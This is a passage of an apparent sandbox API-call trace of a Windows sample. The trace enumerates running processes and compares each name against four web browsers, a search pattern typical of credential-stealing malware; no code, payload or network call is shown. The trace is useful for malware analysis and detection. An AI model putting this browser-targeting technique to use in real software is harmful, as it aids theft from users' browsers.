(lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.601] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.601] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.601] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.601] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.601] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.601] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.601] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.601] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0173.602] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0173.602] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0173.602] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0173.602] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.602] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.602] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.602] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.602] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.602] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.602] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.603] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.603] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.603] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.603] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.603] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0173.603] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0173.603] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0173.603] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0173.604] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.604] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0173.604] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0173.604] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0173.604] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0173.604] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.604] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0173.605] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0173.605] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0173.605] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0173.605] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.605] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.618] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.618] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.618] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.619] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.619] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0173.619] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0173.619] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0173.619] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0173.619] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.619] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0173.620] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0173.620] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0173.620] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0173.620] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.620] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0173.620] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0173.620] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0173.620] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0173.620] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.620] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0173.621] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0173.621] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0173.621] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0173.621] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.621] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0173.621] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0173.621] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0173.621] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0173.621] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.621] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0173.622] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0173.622] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0173.622] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0173.622] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.622] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0173.623] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0173.623] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0173.623] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0173.623] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.623] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0173.623] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0173.623] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0173.623] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0173.623] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.623] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0173.624] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0173.624] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0173.624] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0173.624] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.624] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0173.624] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0173.624] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0173.624] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0173.624] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.624] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0173.625] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0173.625] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0173.625] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0173.625] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.625] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0173.625] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0173.625] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0173.625] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0173.625] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.626] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0173.626] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0173.626] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0173.626] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0173.626] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.626] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0173.627] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0173.627] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0173.627] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0173.627] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.627] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0173.627] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0173.627] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0173.627] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0173.627] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.627] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0173.628] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0173.628] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0173.628] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0173.628] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.628] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0173.628] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0173.628] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0173.628] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0173.628] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.628] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0173.629] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0173.629] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0173.629] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0173.629] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.629] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0173.629] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0173.629] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0173.629] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0173.629] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.630] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0173.630] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0173.630] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0173.630] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0173.630] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.630] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0173.631] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0173.631] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0173.631] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0173.631] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.631] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0173.631] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0173.631] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0173.631] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0173.631] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.631] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.632] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0173.632] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0173.632] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0173.632] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.632] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.632] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.632] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.632] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.632] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.632] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0173.633] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0173.633] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0173.633] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0173.633] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.633] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.633] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.633] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.633] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.633] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.634] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0173.634] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0173.634] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0173.634] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0173.634] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.634] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.635] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.635] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.635] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.635] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.635] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.635] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0173.635] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0173.635] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0173.635] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.635] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0173.636] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0173.636] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0173.636] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0173.636] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.636] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.636] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0173.679] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0173.679] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0173.679] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.679] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.680] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0173.680] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0173.680] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0173.680] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.680] Process32Next (in: 